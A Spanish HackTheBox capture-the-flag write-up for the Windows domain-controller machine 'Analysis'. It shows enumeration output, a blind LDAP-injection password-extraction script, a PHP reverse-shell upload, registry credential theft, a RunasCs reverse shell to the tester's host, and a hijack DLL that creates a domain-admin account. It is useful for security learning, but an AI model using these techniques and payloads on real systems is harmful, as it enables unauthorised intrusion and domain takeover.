Analysis es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Difícil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Analysis 10.129.234.234 a /etc/hosts como analysis.htb y comenzamos con el escaneo de puertos nmap.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
$ nmap -sS -p- --open --min-rate 5000 -vvv -n -oA enumeration/nmap1 10.129.234.234 Nmap scan report for 10.129.234.234 Host is up, received reset ttl 127 (0.038s latency). Scanned at 2024-01-20 22:23:58 GMT for 15s Not shown: 65428 closed tcp ports (reset), 78 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 53/tcp open domain syn-ack ttl 127 80/tcp open http syn-ack ttl 127 88/tcp open kerberos-sec syn-ack ttl 127 135/tcp open msrpc syn-ack ttl 127 139/tcp open netbios-ssn syn-ack ttl 127 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 464/tcp open kpasswd5 syn-ack ttl 127 593/tcp open http-rpc-epmap syn-ack ttl 127 636/tcp open ldapssl syn-ack ttl 127 3268/tcp open globalcatLDAP syn-ack ttl 127 3269/tcp open globalcatLDAPssl syn-ack ttl 127 3306/tcp open mysql syn-ack ttl 127 5985/tcp open wsman syn-ack ttl 127 9389/tcp open adws syn-ack ttl 127 33060/tcp open mysqlx syn-ack ttl 127 47001/tcp open winrm syn-ack ttl 127 49287/tcp open unknown syn-ack ttl 127 49664/tcp open unknown syn-ack ttl 127 49665/tcp open unknown syn-ack ttl 127 49666/tcp open unknown syn-ack ttl 127 49667/tcp open unknown syn-ack ttl 127 49669/tcp open unknown syn-ack ttl 127 49670/tcp open unknown syn-ack ttl 127 49671/tcp open unknown syn-ack ttl 127 49674/tcp open unknown syn-ack ttl 127 49675/tcp open unknown syn-ack ttl 127 49692/tcp open unknown syn-ack ttl 127 49705/tcp open unknown syn-ack ttl 127 Read data files from: /usr/bin/../share/nmap # Nmap done at Sat Jan 20 22:24:13 2024 -- 1 IP address (1 host up) scanned in 14.85 seconds |
Detectados los puertos abiertos lanzamos un escaneo más detallado sobre los mismos
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 |
$ nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3306,5985,9389,33060,47001,49287,49664,49665,49666,49667,49669,49670,49671,49674,49675,49692,49705 -oA enumeration/nmap2 10.129.234.234 Nmap scan report for 10.129.234.234 Host is up (0.039s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-20 22:25:05Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3306/tcp open mysql MySQL (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 33060/tcp open mysqlx? | fingerprint-strings: | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, X11Probe, afp: | Invalid message" | HY000 | LDAPBindReq: | *Parse error unserializing protobuf message" | HY000 | oracle-tns: | Invalid message-frame." |_ HY000 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49287/tcp open msrpc Microsoft Windows RPC 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49705/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port33060-TCP:V=7.94%I=7%D=1/20%Time=65AC4846%P=x86_64-pc-linux-gnu%r(G SF:enericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\ SF:0\x0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r SF:(RTSPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0 SF:\x0b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x SF:1a\0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0 SF:\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Help,9," SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x SF:05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05 SF:HY000")%r(TerminalServerCookie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(Kerb SF:eros,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\0\0\x0b\x SF:08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x0 SF:1\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(FourOhFourR SF:equest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9,"\x05\0\0\0\x0b\ SF:x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\ SF:0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(LDAPB SF:indReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x08\x01\x10\x88'\x SF:1a\*Parse\x20error\x20unserializing\x20protobuf\x20message\"\x05HY000") SF:%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\ SF:0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\ SF:0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x SF:0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messa SF:ge\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSReques SF:t,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\x05\0\0\0\x0b\x08 SF:\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid\x20message-frame\ SF:.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\ SF:x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInval SF:id\x20message\"\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"); Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-01-20T22:26:01 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jan 20 22:26:10 2024 -- 1 IP address (1 host up) scanned in 73.49 seconds |
Enumeración
Accedemos en primer lugar al portal web del puerto 80 y vemos la siguiente página web

Revisamos la misma pero no vemos gran cosa así que enumeramos directorios, pero nada relevante, procedemos a enumerar subdominios
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
$ ffuf -u http://analysis.htb -w /data/tools/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.analysis.htb" -t 100 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : GET :: URL : http://analysis.htb :: Wordlist : FUZZ: /data/tools/SecLists/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.analysis.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 100 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 37ms] * FUZZ: internal :: Progress: [114441/114441] :: Job [1/1] :: 1141 req/sec :: Duration: [0:03:04] :: Errors: 3 :: |
Añadimos el dominio descubierto, internal.analysis.htb al fichero hosts y accedemos y vemos una página similar a la anterior así que procedemos a enumerar ficheros y directorios
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
$ feroxbuster -u http://internal.analysis.htb/ -w /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 -n ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://internal.analysis.htb/ 🚀 Threads │ 100 📖 Wordlist │ /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🚫 Do Not Recurse │ true 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 29l 91w 1273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 403 GET 29l 93w 1284c http://internal.analysis.htb/ 301 GET 2l 10w 170c http://internal.analysis.htb/users => http://internal.analysis.htb/users/ 301 GET 2l 10w 174c http://internal.analysis.htb/dashboard => http://internal.analysis.htb/dashboard/ 301 GET 2l 10w 170c http://internal.analysis.htb/Users => http://internal.analysis.htb/Users/ 301 GET 2l 10w 174c http://internal.analysis.htb/employees => http://internal.analysis.htb/employees/ 301 GET 2l 10w 174c http://internal.analysis.htb/Dashboard => http://internal.analysis.htb/Dashboard/ |
Vemos varios directorios así que enumeramos cada uno de ellos por separado a ver que encontramos
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
$ feroxbuster -u http://internal.analysis.htb/users/ -x php -w /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://internal.analysis.htb/users/ 🚀 Threads │ 100 📖 Wordlist │ /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 29l 91w 1273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 1l 2w 17c http://internal.analysis.htb/users/list.php 200 GET 1l 2w 17c http://internal.analysis.htb/users/List.php |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
$ feroxbuster -u http://internal.analysis.htb/employees/ -x php -w /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://internal.analysis.htb/employees/ 🚀 Threads │ 100 📖 Wordlist │ /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 29l 91w 1273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 30l 60w 1085c http://internal.analysis.htb/employees/login.php 200 GET 30l 60w 1085c http://internal.analysis.htb/employees/Login.php |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
$ feroxbuster -u http://internal.analysis.htb/dashboard/ -x php -w /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://internal.analysis.htb/dashboard/ 🚀 Threads │ 100 📖 Wordlist │ /data/tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 29l 91w 1273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 4l 5w 38c http://internal.analysis.htb/dashboard/index.php 403 GET 29l 93w 1284c http://internal.analysis.htb/dashboard/ 301 GET 2l 10w 178c http://internal.analysis.htb/dashboard/img => http://internal.analysis.htb/dashboard/img/ 301 GET 2l 10w 182c http://internal.analysis.htb/dashboard/uploads => http://internal.analysis.htb/dashboard/uploads/ 200 GET 0l 0w 0c http://internal.analysis.htb/dashboard/upload.php 200 GET 4l 4w 35c http://internal.analysis.htb/dashboard/details.php 301 GET 2l 10w 178c http://internal.analysis.htb/dashboard/css => http://internal.analysis.htb/dashboard/css/ 200 GET 4l 5w 38c http://internal.analysis.htb/dashboard/Index.php 301 GET 2l 10w 178c http://internal.analysis.htb/dashboard/lib => http://internal.analysis.htb/dashboard/lib/ 200 GET 4l 4w 35c http://internal.analysis.htb/dashboard/form.php 301 GET 2l 10w 177c http://internal.analysis.htb/dashboard/js => http://internal.analysis.htb/dashboard/js/ 302 GET 1l 1w 3c http://internal.analysis.htb/dashboard/logout.php => ../employees/login.php 200 GET 4l 4w 35c http://internal.analysis.htb/dashboard/tickets.php 200 GET 4l 4w 35c http://internal.analysis.htb/dashboard/emergency.php 301 GET 2l 10w 178c http://internal.analysis.htb/dashboard/IMG => http://internal.analysis.htb/dashboard/IMG/ 404 GET 0l 0w 1259c http://internal.analysis.htb/dashboard/img/333 404 GET 0l 0w 1259c http://internal.analysis.htb/dashboard/lib/pf.php 404 GET 0l 0w 1259c http://internal.analysis.htb/dashboard/uploads/380 404 GET 0l 0w 1259c http://internal.analysis.htb/dashboard/lib/321 [>-------------------] - 20s 47141/8916754 63m found:22 errors:2 🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_internal_analysis_htb_dashboard_-1705796211.state ... [>-------------------] - 20s 47149/8916754 63m found:22 errors:2 [>-------------------] - 20s 4451/1273819 220/s http://internal.analysis.htb/dashboard/ [>-------------------] - 20s 4234/1273819 214/s http://internal.analysis.htb/dashboard/img/ [>-------------------] - 20s 3957/1273819 202/s http://internal.analysis.htb/dashboard/uploads/ [>-------------------] - 19s 3547/1273819 187/s http://internal.analysis.htb/dashboard/css/ [>-------------------] - 19s 3472/1273819 187/s http://internal.analysis.htb/dashboard/lib/ [>-------------------] - 18s 3375/1273819 186/s http://internal.analysis.htb/dashboard/js/ [>-------------------] - 4s 281/1273819 64/s http://internal.analysis.htb/dashboard/IMG/ |
Nos fijamos en uno en concreto, /users/list.php y accedemos a ver que hay

Nos falta un parámetro, que posiblemente sea un nombre de usuario, así que vamos a enumerar usuarios con kerbrute
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
$ kerbrute userenum -d analysis.htb --dc analysis.htb /data/tools/SecLists/Usernames/xato-net-10-million-usernames.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 01/20/24 - Ronnie Flathers @ropnop 2024/01/20 22:36:07 > Using KDC(s): 2024/01/20 22:36:07 > analysis.htb:88 2024/01/20 22:36:57 > [+] VALID USERNAME: jdoe@analysis.htb 2024/01/20 22:37:25 > [+] VALID USERNAME: ajohnson@analysis.htb 2024/01/20 22:38:28 > [+] VALID USERNAME: cwilliams@analysis.htb 2024/01/20 22:38:57 > [+] VALID USERNAME: wsmith@analysis.htb 2024/01/20 22:40:26 > [+] VALID USERNAME: jangel@analysis.htb 2024/01/20 22:46:20 > [+] VALID USERNAME: technician@analysis.htb |
Y obtenemos varios usuarios existentes en el sistema por lo que vamos a probar con uno de ellos y varios parámetros manualmente y descubrimos que el parámetro name existe

Hacemos algunas pruebas y descubrimos que es posible una injección a través de ldap con el siguiente payload
|
1 |
technician)(Description=* |
Sabemos la posibilidad debido a que si introducimos un carácter que existe nos devuelve el nombre del usuario, y si este no existe nos aparece el valor CONTACT_, así que hacemos un pequeño script en python para automatizar esta tarea
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
#!/usr/bin/python3 import requests import string from time import sleep import sys prefix = "technician)(Description=" check_name = "technician" url = "http://internal.analysis.htb/users/list.php?name=" alphabet = [i for i in string.ascii_letters + string.digits] alphabet.append("\=") alphabet.append("\*") alphabet.append("\#") alphabet.append("{") alphabet.append("}") alphabet.append("\(") alphabet.append("\)") def check_data(data): r = requests.get(f"{url}{prefix}{data}") if "</table>" == r.text: return False elif f"{check_name}" in r.text: #sys.stdout.write(f"Success: {data}") return True else: return False def check_append(): result = "" while True: for i in alphabet: if check_data(result + i + "*"): result += i break else: break return result def check_prepend(): result = "" while True: for i in alphabet: if check_data("*" + i + result): result = i + result break else: break return result if __name__ == "__main__": print("Exploiting...") prep = check_prepend() app = check_append() print(f"prepend password: {prep}") print(f"append password: {app}") |
Lo ejecutamos y obtenemos una password
|
1 2 3 |
$ python3 internal-nosqli.py prepend password: 97nttl\*4qp96bv append password: 97nttl\*4qp96bv |
Así que la utilizamos para acceder al portal de login que vimos en la enumeración de ficheros y directorios

Y entramos con las credenciales descubiertas

Revisamos el portal y en la sección de «SOC Report» es posible subir ficheros

Así que subimos una revshell en php para windows y obtenemos acceso con el usuario svc_web
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
$ nc -nlvp 443 Listening on 0.0.0.0 443 Connection received on 10.129.234.242 61050 b374k shell : connected Microsoft Windows [version 10.0.17763.5328] (c) 2018 Microsoft Corporation. Tous droits r�serv�s. C:\windows\temp>whoami whoami analysis\svc_web C:\windows\temp> |
Escalado al usuario jdoe
Una vez dentro de la máquina utilizamos el script de PrivescCheck para ver que podemos utilizar a continuación para escalar privilegios.
Y en el log vemos una posible vulnerabilidad
|
1 2 3 4 5 6 7 8 9 10 11 |
???????????????????????????????????????????????????????????????? ? CATEGORY ? TA0006 - Credential Access ? ? NAME ? LSA Protection ? ???????????????????????????????????????????????????????????????? ? Check whether LSA protection is enabled. Note that when LSA ? ? protection is enabled, 'lsass.exe' runs as a Protected ? ? Process Light (PPL) and thus can only be accessed by other ? ? protected processes with an equivalent or higher protection ? ? level. ? ???????????????????????????????????????????????????????????????? [*] Status: Vulnerable - Low |
Así que sacamos las claves del registro y tenemos una password
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
PS C:\temp> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no DefaultDomainName REG_SZ analysis.htb. DefaultUserName REG_SZ jdoe DisableBackButton REG_DWORD 0x1 EnableSIHostIntegration REG_DWORD 0x1 ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe ShellCritical REG_DWORD 0x0 ShellInfrastructure REG_SZ sihost.exe SiHostCritical REG_DWORD 0x0 SiHostReadyTimeOut REG_DWORD 0x0 SiHostRestartCountLimit REG_DWORD 0x0 SiHostRestartTimeGap REG_DWORD 0x0 Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile WinStationsDisabled REG_SZ 0 ShellAppRuntime REG_SZ ShellAppRuntime.exe scremoveoption REG_SZ 0 DisableCAD REG_DWORD 0x1 LastLogOffEndTimePerfCounter REG_QWORD 0x103bff874 ShutdownFlags REG_DWORD 0x13 DisableLockWorkstation REG_DWORD 0x0 AutoAdminLogon REG_SZ 1 DefaultPassword REG_SZ 7y4Z4^*y9Zzj AutoLogonSID REG_SZ S-1-5-21-916175351-3772503854-3498620144-1103 LastUsedUsername REG_SZ jdoe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey |
Revisamos los usuarios existentes en el servidor
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
PS C:\temp> dir c:\users dir c:\users R�pertoire�: C:\users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/01/2024 10:33 Administrateur d----- 05/01/2024 21:29 jdoe d-r--- 07/05/2023 21:44 Public d----- 26/05/2023 11:02 soc_analyst d----- 26/05/2023 14:20 webservice d----- 23/05/2023 10:10 wsmith |
Y utilizamos runas para escalar al usuario jdoe
|
1 2 3 4 5 6 7 |
PS C:\temp> .\RunasCs.exe 'jdoe@analysis.htb' '7y4Z4^*y9Zzj' cmd.exe -r 10.10.14.102:4444 .\RunasCs.exe 'jdoe@analysis.htb' '7y4Z4^*y9Zzj' cmd.exe -r 10.10.14.102:4444 [*] Warning: The logon for user 'jdoe@analysis.htb' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token. [+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-1341ae$\Default [+] Async process 'C:\Windows\system32\cmd.exe' with pid 8980 created in background. |
Obteniendo una revshell con el usuario
|
1 2 3 4 5 6 7 8 9 10 11 |
$ nc -nlvp 4444 Listening on 0.0.0.0 4444 Connection received on 10.129.234.242 61146 Microsoft Windows [Version 10.0.17763.5329] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami analysis\jdoe C:\Windows\system32> |
Obteniendo la flag de user
Una vez que tenemos acceso con el usuario jdoe vamos al escritorio del mismo y cogemos la flag
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
c:\Users\jdoe\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 0071-E237 Directory of c:\Users\jdoe\Desktop 01/10/2024 07:55 AM <DIR> . 01/10/2024 07:55 AM <DIR> .. 01/20/2024 10:13 PM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 4,084,797,440 bytes free c:\Users\jdoe\Desktop>type user.txt type user.txt 531e086b563459cb48caffbac717a9f5 c:\Users\jdoe\Desktop> |
Escalado de privilegios
Revisamos en la raíz del servidor y vemos una carpeta de snort
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
c:\>dir dir Volume in drive C has no label. Volume Serial Number is 0071-E237 Directory of c:\ 06/12/2023 09:01 AM <DIR> inetpub 01/21/2024 01:22 AM <DIR> Microsoft 11/05/2022 08:14 PM <DIR> PerfLogs 05/08/2023 09:20 AM <DIR> PHP 07/09/2023 09:54 AM <DIR> private 11/18/2023 09:56 AM <DIR> Program Files 05/08/2023 09:11 AM <DIR> Program Files (x86) 07/09/2023 09:57 AM <DIR> Snort 01/21/2024 01:43 AM 314,876 snortlog.txt 01/21/2024 01:30 AM <DIR> temp 05/26/2023 01:20 PM <DIR> Users 01/10/2024 03:52 PM <DIR> Windows 1 File(s) 314,876 bytes 11 Dir(s) 4,084,711,424 bytes free |
Así que revisaremos la versión del mismo
|
1 2 3 |
c:\Snort\etc>type snort.conf|findstr VERSION type snort.conf|findstr VERSION # VERSIONS : 2.9.20 |
Si revisamos en google encontramos una vulnerabilidad a través de la librería tcapi, así que siguiendo el ejemplo de la poc generamos un fichero cpp con nuestro código, en nuestro caso, creamos un usuario nuevo y le damos permisos de admin. Ojo que la máquina está en francés, no os déis de cabezazos como me pasó a mí hasta que me fijé.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
#include <stdlib.h> #include<windows.h> //gcc -c tcapi.c //gcc -shared -o tcapi.dll tcapi.o BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: int i; i = system ("net user privesc password123! /add /domain"); i = system ("net group 'Admins du domaine' privesc /add /domain"); break; } return 0; } |
Una vez generado nuestro código compilamos el fichero
|
1 |
$ x86_64-w64-mingw32-gcc tcapi.cpp --shared -o tcapi.dll |
Revisamos los directorios y vemos que podemos escribir
|
1 2 3 4 5 6 7 8 |
*Evil-WinRM* PS C:\snort\lib\snort_dynamicpreprocessor> icacls C:\snort\lib\snort_dynamicpreprocessor C:\snort\lib\snort_dynamicpreprocessor AUTORITE NT\SystŠme:(I)(OI)(CI)(F) BUILTIN\Administrateurs:(I)(OI)(CI)(F) BUILTIN\Utilisateurs:(I)(OI)(CI)(RX) BUILTIN\Utilisateurs:(I)(CI)(AD) BUILTIN\Utilisateurs:(I)(CI)(WD) CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F) Successfully processed 1 files; Failed processing 0 files |
